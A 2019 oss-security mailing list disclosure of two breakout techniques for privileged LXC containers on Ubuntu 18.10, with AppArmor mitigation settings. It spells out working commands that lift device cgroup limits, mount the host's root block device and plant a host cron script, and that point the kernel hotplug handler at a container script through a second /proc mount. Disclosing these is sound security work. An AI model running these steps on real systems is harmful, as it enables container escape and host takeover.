Date: Tue, 12 Feb 2019 23:34:43 +0500 From: "Alexander E. Patrakov" <patrakov@...il.com> To: oss-security@...ts.openwall.com Cc: lxc-users@...ts.linuxcontainers.org Subject: Two more LXC breakouts (both privileged), apparmor issue? Hello, there is a container breakout currently discussed (CVE-2019-5736), which affected LXC among others. Let me share two more, IMHO easier, breakout techniques that work against LXC, at least in Ubuntu 18.10, which has LXC 3.0.3. Both techniques work only in privileged containers, and so, given that LXC upstream does not treat privileged containers as a viable security boundary, I don't think there is anything CVE-worthy here, just an opportunity to tighten the defaults, unless this is a bug in AppArmor or its policies. Also, please treat this whole email as Ubuntu-specific, because of the references to AppArmor. The primary goal of this email is to post exploits, so that I can point people to something better than just nonconstructive words about "security implications" when they ask :) The secondary goal is to learn a bit more about AppArmor, i.e. I was surprised that the "mount" step works in the first exploit, want to know why. I.e. what's the real difference between "lxc-container-default" and "lxc-container-default-with-mounting" profiles. When reproducing exploits, it is important that you install openssh in the test containers, and work from an ssh connection, not lxc-attach. That's because of slightly-different namespace setups, and because lxc-attach requires root, so "you already have to be root to break out", i.e. the achievement becomes too trivial. Prior art: - myself trying to debug why the memory limit does not apply: https://github.com/lxc/lxc/issues/2845 - an existing bug about unintended access to block devices: https://github.com/lxc/lxc/issues/2762 Exploit 1: abuse of device cgroups and block devices Prerequisite: a privileged container created with the "download" template, without tweaking any AppArmor settings. E.g.: sudo lxc-create -t download -n exploit1 -- -d ubuntu -r cosmic -a amd64 Install openssh there, then let a hacker ssh into it and let them sudo to root. So now the hacker has root in a privileged container. By default, the container is covered by the "lxc-container-default-cgns" profile. Or at least, that's what mentioned in dmesg in denial messages. It specifically allows mounting of cgroup and cgroup2 filesystems under /sys/fs/cgroup. And, by default, LXC relies on systemd inside the container to mount cgroup hierarchies that it needs. There are also other profiles that can be used but are not the default: - lxc-container-default: does not allow mounting cgroup and cgroup2 - lxc-container-default-with-mounting: does not allow mounting cgroup and cgroup2, but supposedly allows ext2/3/4, xfs, and btrfs. - lxc-container-default-with-nesting: allows cgroup and cgroup2, also allows almost arbitrary bind mounts. So, to break out, let's exploit the fact that, on Ubuntu, cgroups are the only protection against mounting arbitrary block devices in containers - but, by default, there is nothing that prevents the hacker from lifting the restriction from within a container. So: # Step 1: find all device cgroups, add permission to use all block devices. f=`find /sys/fs/cgroup -name devices.allow` for d in $f ; do echo -n 'b *:* rwm' > "$d" ; done # you may need to repeat this a few times for d in $f ; do echo -n 'b *:* rwm' > "$d" ; done # ok, repeating # Step 2: find an interesting block device, create a device node and mount it. cat /proc/partitions # found /dev/vda1, looks like the host's root fs is there mknod /dev/vda1 b 252 1 # based on numbers from /proc/partitions mount /dev/vda1 /mnt # I don't know why this succeeds (on ext4), but it does # Step 3: write some code that will run on the host nano /mnt/etc/cron.d/badscript # Step 4: wait for cron to run it on the host I was able to mitigate this by not letting the container access any cgroups except the bare minimum necessary for systemd to function. Not sure if this creates other security problems. lxc.apparmor.profile = lxc-container-default lxc.mount.entry = tmpfs sys/fs/cgroup tmpfs nosuid,nodev,noexec,mode=755 lxc.mount.entry = cgroup sys/fs/cgroup/systemd cgroup nosuid,nodev,noexec,xattr,name=systemd,create=dir Question: why is this not the default? Exploit 2: abuse of hotplug handler Prerequisite: setup for nested privileged containers. E.g. this: sudo lxc-create -t download -n exploit2 -- -d ubuntu -r cosmic -a amd64 ... with this line uncommented in the config: lxc.include = /usr/share/lxc/config/nesting.conf (the config does warn about "security implications", but this is not enough to convince people, "known root hole" would be a better wording). To break out, let's exploit the fact that the kernel, when told so via /proc, will run arbitary programs for us. I mean, in reaction to hotplug events - the legacy handler is settable via /proc/sys/kernel/hotplug. There are some rules in the apparmor profile that prohibit writing there, but apparmor is path-based, and these rules would not fire if a copy of /proc is mounted somewhere else (which is needed for nesting but is disallowed otherwise). So: # Step 1: write a script that will run on the host. nano /badscript chmod +x /badscript # Step 2: make it a hotplug event handler via a second instance of /proc mkdir /proc2 mount --bind /proc /proc2 echo /var/lib/lxc/exploit2/rootfs/badscript > /proc2/sys/kernel/hotplug # Well, there was some guessing here based on the default container path, I hope it's OK # Step 3: provoke some hotplug event. Actually, several events. ip link add dummy0 type dummy -- Alexander E. Patrakov
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.